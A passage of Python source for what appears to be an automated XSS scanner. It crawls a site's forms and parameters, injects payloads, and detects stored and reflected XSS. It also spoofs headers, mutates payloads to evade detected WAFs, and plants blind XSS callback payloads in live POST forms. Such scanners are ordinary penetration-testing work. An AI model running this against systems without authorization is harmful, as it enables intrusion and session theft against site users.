                    if tag_type in SKIP_INPUT_TYPES:
                        continue
                    label_text = tag.get("placeholder", "")
                    if not label_text and tag.get("id"):
                        lel = soup.find("label", attrs={"for": tag.get("id")})
                        if lel:
                            label_text = lel.get_text(strip=True)
                    if not label_text:
                        pl = tag.find_parent("label")
                        if pl:
                            label_text = pl.get_text(strip=True)
                    label_text = label_text or name
                    ctx = "textarea" if tag.name == "textarea" else ("hidden" if tag_type == "hidden" else "input")
                    injectable.append({"name": name, "label": label_text, "id": tag.get("id", ""), "context": ctx})

                for field in injectable:
                    key = f"{method}::{form_url}::{field['name']}"
                    if key not in seen_keys:
                        seen_keys.add(key)
                        points.append({
                            "type": "form_field", "url": form_url,
                            "param": field["name"], "label": field["label"],
                            "id": field["id"], "method": method,
                            "fields": all_fields, "context": field["context"],
                            "page_html": html,
                        })

            for a in soup.find_all("a", href=True):
                href = urljoin(actual_url, a["href"])
                if not href.startswith(base):
                    continue
                p = urlparse(href)
                if p.query:
                    for param in parse_qs(p.query, keep_blank_values=True):
                        key = f"GET::{href}::{param}"
                        if key not in seen_keys:
                            seen_keys.add(key)
                            points.append({
                                "type": "url_param", "url": href, "param": param,
                                "label": param, "id": "", "method": "GET",
                                "fields": {}, "context": "url_param", "page_html": html,
                            })

    await asyncio.gather(*[process_page(p) for p in pages])
    return points


# ─── Injection Test ───────────────────────────────────────────────────────────

async def test_injection_point(
    client: httpx.AsyncClient,
    point: Dict[str, Any],
    payload: str,
    context: str = "html_body",
    deep: bool = False,
    stored_check_pages: List[str] = None,
    waf_info: Optional[Dict[str, Any]] = None,
) -> Optional[Dict[str, Any]]:
    """Test one injection point with one payload. Context is pre-computed externally."""
    is_get = (point["method"] == "GET" or point["type"] in ("url_param", "path_segment"))
    test_payloads = build_context_payloads(payload, context)
    
    # If WAF detected, add adaptive delay
    if waf_info and waf_info.get("detected"):
        await asyncio.sleep(random.uniform(0.3, 1.5))

    for test_payload in test_payloads:
        try:
            hdrs = get_spoofed_headers()
            if is_get:
                if point["type"] == "path_segment":
                    # For path segments, replace the segment in the URL
                    parsed = urlparse(point["url"])
                    segments = [s for s in parsed.path.split("/") if s]
                    seg_idx = point.get("segment_index", 0)
                    if seg_idx < len(segments):
                        segments[seg_idx] = test_payload
                    test_url = f"{parsed.scheme}://{parsed.netloc}/" + "/".join(segments)
                else:
                    test_url = inject_param(point["url"], point["param"], test_payload)
                resp = await client.get(test_url, headers=hdrs, follow_redirects=True,
                                        timeout=httpx.Timeout(12.0))
            else:
                data = dict(point["fields"])
                data[point["param"]] = test_payload
                resp = await client.post(point["url"], data=data, headers=hdrs,
                                         follow_redirects=True, timeout=httpx.Timeout(12.0))

            result = check_reflection(resp.text, test_payload)
            if result["reflected"]:
                if is_get:
                    if point["type"] == "path_segment":
                        vuln_url = test_url
                        location = f"{point['url']} -> Path segment injection"
                    else:
                        vuln_url = inject_param(point["url"], point["param"], test_payload)
                        location = f"{point['url'].split('?')[0]}?{point['param']}="
                else:
                    vuln_url = None
                    fd = point.get("label", point["param"])
                    location = f"{point['url']} -> \"{fd}\" field"
                if point.get("id"):
                    location += f" (#{point['id']})"
                return {
                    "endpoint": point["url"],
                    "parameter": point["param"],
                    "field_label": point.get("label", point["param"]),
                    "location_summary": location,
                    "vulnerable_url": vuln_url,
                    "method": point["method"],
                    "context_type": context,
                    "payload": test_payload,
                    "confidence": result["confidence"],
                    "severity": "CRITICAL" if result["confidence"] == "HIGH" else "MEDIUM",
                    "evidence": result["evidence"],
                    "impact": (
                        "Reflected XSS: attacker can steal cookies, hijack sessions, "
                        "and execute arbitrary JavaScript in the victim's browser."
                    ),
                    "xss_type": "reflected",
                    "point_type": point["type"],
                    "form_fields": point.get("fields") if point["type"] == "form_field" else None,
                }

            # ── Mutation retry: if payload was blocked, try encoded mutations ──
            if waf_info and waf_info.get("detected"):
                mutations = mutate_payload(test_payload)
                for mutated in mutations[:3]:  # limit to 3 mutations per payload
                    try:
                        if is_get:
                            mut_url = inject_param(point["url"], point["param"], mutated) if point["type"] != "path_segment" else test_url
                            resp2 = await client.get(mut_url, headers=get_spoofed_headers(),
                                                      follow_redirects=True, timeout=httpx.Timeout(10.0))
                        else:
                            mut_data = dict(point["fields"])
                            mut_data[point["param"]] = mutated
                            resp2 = await client.post(point["url"], data=mut_data, headers=get_spoofed_headers(),
                                                       follow_redirects=True, timeout=httpx.Timeout(10.0))
                        
                        mut_result = check_reflection(resp2.text, mutated)
                        if mut_result["reflected"]:
                            vuln_url = inject_param(point["url"], point["param"], mutated) if is_get and point["type"] != "path_segment" else None
                            location = f"{point['url']} -> {point.get('label', point['param'])} (WAF bypass via encoding mutation)"
                            return {
                                "endpoint": point["url"],
                                "parameter": point["param"],
                                "field_label": point.get("label", point["param"]),
                                "location_summary": location,
                                "vulnerable_url": vuln_url,
                                "method": point["method"],
                                "context_type": context,
                                "payload": mutated,
                                "confidence": mut_result["confidence"],
                                "severity": "CRITICAL" if mut_result["confidence"] == "HIGH" else "HIGH",
                                "evidence": mut_result["evidence"],
                                "impact": "WAF Bypass XSS: payload evaded WAF filtering through encoding mutation. This indicates the WAF can be circumvented.",
                                "xss_type": "reflected",
                                "point_type": point["type"],
                                "form_fields": point.get("fields") if point["type"] == "form_field" else None,
                            }
                    except Exception:
                        continue

            # Stored XSS — deep mode only, POST only
            if deep and not is_get and stored_check_pages and resp.status_code < 400:
                for check_url in stored_check_pages[:3]:
                    try:
                        sr = await client.get(check_url, headers=get_spoofed_headers(),
                                              timeout=httpx.Timeout(8.0))
                        sr2 = check_reflection(sr.text, test_payload)
                        if sr2["reflected"]:
                            return {
                                "endpoint": point["url"],
                                "parameter": point["param"],
                                "field_label": point.get("label", point["param"]),
                                "location_summary": f"{check_url} -> Stored via POST to {point['url']}",
                                "vulnerable_url": check_url,
                                "method": "POST",
                                "context_type": "stored",
                                "payload": test_payload,
                                "confidence": "HIGH",
                                "severity": "CRITICAL",
                                "evidence": sr2["evidence"],
                                "impact": "Stored XSS: payload executes for every user visiting the page.",
                                "xss_type": "stored",
                                "point_type": point["type"],
                                "form_fields": point.get("fields") if point["type"] == "form_field" else None,
                            }
                    except Exception:
                        continue

        except Exception as e:
            logger.debug(f"Payload error: {e}")
            continue

    return None


# ─── NEW: Inject Blind XSS Payloads ──────────────────────────────────────────

async def inject_blind_xss(
    client: httpx.AsyncClient,
    points: List[Dict[str, Any]],
    cancel_event: Optional[asyncio.Event] = None,
) -> List[Dict[str, Any]]:
    """
    Inject blind XSS payloads into all POST form fields.
    These payloads call back to a callback server if triggered later (e.g., in admin panel).
    Returns a list of 'potential' blind XSS entries for the report.
    """
    blind_vulns = []
    sem = asyncio.Semaphore(10)
    
    # Only target POST form fields
    post_points = [p for p in points if p["method"] == "POST" and p["type"] == "form_field"]
    
    async def inject_one(point: Dict[str, Any], payload: str):
        if cancel_event and cancel_event.is_set():
            return
        async with sem:
            try:
                data = dict(point["fields"])
                data[point["param"]] = payload
                await client.post(point["url"], data=data, headers=get_spoofed_headers(),
                                   follow_redirects=True, timeout=httpx.Timeout(10.0))
            except Exception:
                pass
    
    tasks = []
    for point in post_points[:10]:  # Limit to 10 points
        for payload in BLIND_XSS_PAYLOADS:
            tasks.append(inject_one(point, payload))
    
    if tasks:
        await asyncio.gather(*tasks)
    
    # Add potential blind XSS entries to report
    for point in post_points[:10]:
        blind_vulns.append({
            "endpoint": point["url"],
            "parameter": point["param"],
            "field_label": point.get("label", point["param"]),
            "location_summary": f"{point['url']} -> \"{point.get('label', point['param'])}\" (Blind XSS injected)",
            "vulnerable_url": None,
            "method": "POST",
            "context_type": "blind",
            "payload": BLIND_XSS_PAYLOADS[0],
            "confidence": "LOW",
            "severity": "MEDIUM",
            "evidence": "Blind XSS payloads injected — check callback server for delayed triggers",
            "impact": "Blind/Stored XSS: payloads were injected that may trigger when viewed by admins or other users. Monitor your callback server for execution.",
            "xss_type": "blind",
            "point_type": "form_field",
            "form_fields": point.get("fields"),
        })
    
    return blind_vulns


# ─── Main Scan Runner ─────────────────────────────────────────────────────────

async def run_xss_scan(
    url: str = None,
    target: str = None,
    scan_mode: str = "quick",
    progress_callback: Optional[Callable] = None,
    cancel_event: Optional[asyncio.Event] = None,
) -> Dict[str, Any]:
    start_time = time.time()
    # Support both 'url' and 'target' parameter names for backwards compat
    scan_url = url or target
    if not scan_url:
        return {"error": "No target URL provided", "vulnerabilities": []}
    
    scan_url = normalize_url(scan_url)
    deep = scan_mode == "deep"
    payloads = QUICK_PAYLOADS if scan_mode == "quick" else XSS_PAYLOADS
    vulnerabilities = []
    seen_vulns: set = set()
    tested = 0
    waf_info = {"detected": False, "waf_name": None, "confidence": None}

    async def send(msg: dict):
        if progress_callback:
            try:
                await progress_callback(msg)
            except Exception:
                pass

    try:
        async with httpx.AsyncClient(timeout=TIMEOUT, verify=False, follow_redirects=True) as client:

            # ── Phase 0: Test Connectivity ──────────────────────────────
            await send({"type": "status", "message": "🔌 Testing connectivity..."})
            try:
                await client.head(scan_url, headers=get_spoofed_headers(), timeout=httpx.Timeout(10.0))
            except httpx.ConnectTimeout:
                return {"error": "Connection Timeout: Target is unreachable or blocking the scanner IP.", "vulnerabilities": []}
            except httpx.ConnectError:
                return {"error": "Connection Error: Failed to resolve or connect to the target.", "vulnerabilities": []}
            except Exception:
                pass  # Proceed anyway, head might be blocked

            if cancel_event and cancel_event.is_set():
                return {"error": "Scan cancelled by user", "vulnerabilities": []}

            # ── Phase 1: WAF Detection ────────────────────────────────
            await send({"type": "status", "message": "🛡️ Detecting WAF/firewall..."})
            await send({"type": "progress", "progress": 2})
            waf_info = await detect_waf(client, scan_url)
            
            if waf_info["detected"]:
                waf_msg = f"⚠️ WAF Detected: {waf_info['waf_name'].upper()} (Confidence: {waf_info['confidence']}). Engaging bypass mode..."
                await send({"type": "status", "message": waf_msg})
                await send({"type": "waf_detected", "data": waf_info})
                # Add WAF-specific payloads to the arsenal
                waf_bypasses = WAF_BYPASS_PAYLOADS.get(waf_info["waf_name"], [])
                if waf_bypasses:
                    payloads = list(payloads) + waf_bypasses
            else:
                await send({"type": "status", "message": "✅ No WAF detected. Full payload arsenal active."})
            
            await send({"type": "progress", "progress": 5})

            if cancel_event and cancel_event.is_set():
                return {"error": "Scan cancelled by user", "vulnerabilities": []}

            # ── Phase 2: Spider all pages ────────────────────────────────
            await send({"type": "status", "message": f"🕷️ Spidering {scan_url} for all pages..."})
            all_pages = await spider_all_pages(client, scan_url, deep)
            await send({"type": "status", "message": f"🗺️ Found {len(all_pages)} pages. Extracting injection points..."})
            await send({"type": "progress", "progress": 12})

            if cancel_event and cancel_event.is_set():
                return {"error": "Scan cancelled by user", "vulnerabilities": []}

            # ── Phase 3: Extract JS-discovered endpoints ─────────────────
            await send({"type": "status", "message": "📜 Parsing JavaScript for hidden API endpoints..."})
            js_endpoints = await extract_js_endpoints(client, all_pages)
            if js_endpoints:
                await send({"type": "status", "message": f"🔍 Found {len(js_endpoints)} JS-discovered endpoints. Adding to scan..."})
                all_pages = list(set(all_pages + js_endpoints))
            await send({"type": "progress", "progress": 18})

            if cancel_event and cancel_event.is_set():
                return {"error": "Scan cancelled by user", "vulnerabilities": []}

            # ── Phase 4: DOM XSS — run in parallel with crawl (deep only) ────
            dom_seen: set = set()
            if deep:
                await send({"type": "status", "message": "🌐 Analyzing DOM for client-side XSS sinks..."})
                async def check_dom(page_url: str):
                    try:
                        resp = await client.get(page_url, headers=get_spoofed_headers(),
                                                timeout=httpx.Timeout(8.0))
                        dom_vuln = check_dom_xss(resp.text, page_url)
                        if dom_vuln:
                            key = f"dom::{page_url}"
                            if key not in dom_seen:
                                dom_seen.add(key)
                                vulnerabilities.append(dom_vuln)
                                await send({"type": "vuln_found", "data": dom_vuln})
                    except Exception:
                        pass
                await asyncio.gather(*[check_dom(p) for p in all_pages])
            
            await send({"type": "progress", "progress": 22})

            if cancel_event and cancel_event.is_set():
                return {"error": "Scan cancelled by user", "vulnerabilities": []}

            # ── Phase 5: Crawl injection points (forms + URL params) ─────
            await send({"type": "status", "message": "🔎 Crawling forms, inputs & URL parameters..."})
            points = await crawl_injection_points(client, all_pages)
            await send({"type": "progress", "progress": 28})

            if not points:
                # Fallback: try common paths
                await send({"type": "status", "message": "No forms found. Trying common paths..."})
                common = ["/search", "/query", "/?q=test", "/?s=test", "/?search=test", "/login", "/contact"]
                base = get_base_url(scan_url)
                fallback_pages = [base + p for p in common]
                points = await crawl_injection_points(client, fallback_pages)

            if cancel_event and cancel_event.is_set():
                return {"error": "Scan cancelled by user", "vulnerabilities": []}

            # ── Phase 6: Parameter Discovery (brute-force hidden params) ─────
            await send({"type": "status", "message": f"🔓 Brute-forcing {len(COMMON_PARAMS)} common parameter names..."})
            discovered_params = await discover_hidden_params(client, scan_url, cancel_event)
            if discovered_params:
                await send({"type": "status", "message": f"💡 Discovered {len(discovered_params)} hidden reflective parameters!"})
                points.extend(discovered_params)
            await send({"type": "progress", "progress": 35})

            if cancel_event and cancel_event.is_set():
                return {"error": "Scan cancelled by user", "vulnerabilities": []}

            # ── Phase 6.5: Path Segment Fuzzing ────────────────────────────
            await send({"type": "status", "message": "📂 Fuzzing URL path segments..."})
            path_points = await fuzz_path_segments(client, scan_url, cancel_event)
            if path_points:
                await send({"type": "status", "message": f"📌 Found {len(path_points)} path-based reflection points!"})
                points.extend(path_points)
            await send({"type": "progress", "progress": 38})

            if cancel_event and cancel_event.is_set():
                return {"error": "Scan cancelled by user", "vulnerabilities": []}

            # ── Phase 7: Header injection testing ────────────────────────
            await send({"type": "status", "message": f"📋 Testing {len(INJECTABLE_HEADERS)} HTTP headers for XSS reflection..."})
            header_vulns = await test_header_injection(client, all_pages, payloads, cancel_event, send)
            for hv in header_vulns:
                key = f"{hv['parameter']}::{hv['payload']}::{hv['endpoint']}"
                if key not in seen_vulns:
                    seen_vulns.add(key)
                    vulnerabilities.append(hv)
                    await send({"type": "vuln_found", "data": hv})
            await send({"type": "progress", "progress": 42})

            if cancel_event and cancel_event.is_set():
                return {"error": "Scan cancelled by user", "vulnerabilities": []}

            if not points and not vulnerabilities:
                return {
                    "error": (
                        "No injection points found. The target may use JavaScript rendering, "
                        "require authentication, or have no URL parameters/forms."
                    ),
                    "vulnerabilities": [],
                }

            await send({
                "type": "status",
                "message": f"⚡ {len(points)} injection points across {len(all_pages)} pages. Testing {len(payloads)} payloads...",
            })

            # Pre-compute context for each point ONCE using the probe (saves N*payloads requests)
            async def probe_context(point: Dict[str, Any]) -> str:
                is_get = (point["method"] == "GET" or point["type"] in ("url_param", "path_segment"))
                hdrs = get_spoofed_headers()
                try:
                    if is_get:
                        if point["type"] == "path_segment":
                            return point.get("context", "html_body")
                        probe_url = inject_param(point["url"], point["param"], PROBE_TOKEN)
                        r = await client.get(probe_url, headers=hdrs, follow_redirects=True,
                                             timeout=httpx.Timeout(8.0))
                    else:
                        d = dict(point["fields"])
                        d[point["param"]] = PROBE_TOKEN
                        r = await client.post(point["url"], data=d, headers=hdrs,
                                              follow_redirects=True, timeout=httpx.Timeout(8.0))
                    if PROBE_TOKEN in r.text:
                        return detect_context(r.text, PROBE_TOKEN)
                except Exception:
                    pass
                return point.get("context", "html_body")

            # Run all probes concurrently
            probe_sem = asyncio.Semaphore(20)
            async def bounded_probe(pt):
                async with probe_sem:
                    return await probe_context(pt)

            contexts = await asyncio.gather(*[bounded_probe(pt) for pt in points])
            point_contexts = dict(zip([id(pt) for pt in points], contexts))
            await send({"type": "progress", "progress": 48})

            total = len(points) * len(payloads)
            sem = asyncio.Semaphore(35)

            # Pages to check for stored XSS (the pages we spidered)
            stored_check_pages = all_pages[:10]

            async def test_and_report(point, payload):
                nonlocal tested
                async with sem:
                    if cancel_event and cancel_event.is_set():
                        return
                    ctx = point_contexts.get(id(point), "html_body")
                    result = await test_injection_point(
                        client, point, payload,
                        context=ctx, deep=deep,
                        stored_check_pages=stored_check_pages if deep else None,
                        waf_info=waf_info,
                    )
                    tested += 1
                    if result:
                        key = f"{result['parameter']}::{result['payload']}::{result['endpoint']}"
                        if key not in seen_vulns:
                            seen_vulns.add(key)
                            vulnerabilities.append(result)
                            await send({"type": "vuln_found", "data": result})
                    if tested % 20 == 0:
                        # Scale progress from 48 to 90
                        raw = int((tested / max(total, 1)) * 42) + 48
                        prog = min(90, raw)
                        await send({"type": "progress", "progress": prog})

            tasks = [
                asyncio.create_task(test_and_report(pt, pl))
                for pt in points for pl in payloads
            ]
            if tasks:
                await asyncio.gather(*tasks)

            await send({"type": "progress", "progress": 92})

            if cancel_event and cancel_event.is_set():
                return {"error": "Scan cancelled by user", "vulnerabilities": vulnerabilities}

            # ── Phase 8: Blind XSS injection (deep mode only) ────────────
            if deep and points:
                await send({"type": "status", "message": "🕶️ Injecting blind XSS callback payloads..."})
                blind_vulns = await inject_blind_xss(client, points, cancel_event)
                for bv in blind_vulns:
                    key = f"blind::{bv['parameter']}::{bv['endpoint']}"
                    if key not in seen_vulns:
                        seen_vulns.add(key)
                        vulnerabilities.append(bv)
                        await send({"type": "vuln_found", "data": bv})
            
            await send({"type": "progress", "progress": 98})

    except Exception as e:
        logger.error(f"XSS scan error: {e}", exc_info=True)
        return {"error": str(e), "vulnerabilities": vulnerabilities}

    duration = round(time.time() - start_time, 2)
    critical = sum(1 for v in vulnerabilities if v["severity"] in ("CRITICAL", "HIGH"))
    medium = sum(1 for v in vulnerabilities if v["severity"] == "MEDIUM")

    risk = "critical" if critical > 0 else "high" if medium > 2 else "medium" if medium > 0 else "low"

    return {
        "target": scan_url,
        "scan_mode": scan_mode,
        "vulnerabilities": vulnerabilities,
        "total_vulnerable": len(vulnerabilities),
        "critical_count": critical,
        "medium_count": medium,
        "payloads_tested": tested,
        "risk_level": risk,
        "scan_duration": duration,
        "waf_detected": waf_info.get("detected", False),
        "waf_name": waf_info.get("waf_name"),
        "params_discovered": len([p for p in vulnerabilities if "(discovered)" in (p.get("field_label") or "")]),
        "header_vulns": len([v for v in vulnerabilities if v.get("xss_type") == "header"]),
        "blind_vulns": len([v for v in vulnerabilities if v.get("xss_type") == "blind"]),
        "dom_vulns": len([v for v in vulnerabilities if v.get("xss_type") == "dom"]),
    }
